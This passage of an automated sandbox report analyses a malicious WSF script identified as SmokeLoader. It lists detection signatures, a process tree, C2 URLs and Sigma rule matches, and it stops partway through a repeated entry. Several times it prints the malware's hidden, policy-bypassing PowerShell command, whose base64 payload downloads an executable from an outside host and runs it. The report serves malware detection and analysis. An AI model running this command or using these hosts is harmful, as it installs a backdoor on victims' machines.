Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UkHkCa3IYV.wsf

Overview

General Information

Sample name:UkHkCa3IYV.wsf
renamed because original name is a hash value
Original sample name:62eb856a5f646c2883a3982f15c3eb877641f9e69783383ce8a73c688eccd543.wsf
Analysis ID:1525801
MD5:0359edc4d2038de4660e733f5a80de94
SHA1:681e86b26771ff86c37d8cff72a60b3411f236e9
SHA256:62eb856a5f646c2883a3982f15c3eb877641f9e69783383ce8a73c688eccd543
Tags:bestmagazineforanimalsunicum-ruwsfuser-JAMESWT_MHT
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Encrypted powershell cmdline option found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7100 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\UkHkCa3IYV.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6364 cmdline: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2472 cmdline: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA= MD5: 04029E121A0CFA5991749937DD22A1D9)
        • oBuf.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Local\Temp\oBuf.exe" MD5: 31059E7394B880F017E83804D9B716AB)
          • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • fbhbvci (PID: 4264 cmdline: C:\Users\user\AppData\Roaming\fbhbvci MD5: 31059E7394B880F017E83804D9B716AB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
SourceRuleDescriptionAuthorStrings
00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x254:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000005.00000002.1994744005.00000000006B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000005.00000002.1994744005.00000000006B0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x654:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000005.00000002.1994821763.00000000006E1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        Click to see the 11 entries

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6364, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 2472, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6364, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 2472, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6364, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 2472, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6364, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 2472, ProcessName: powershell.exe
        Source: Process startedAuthor: frack113: Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc 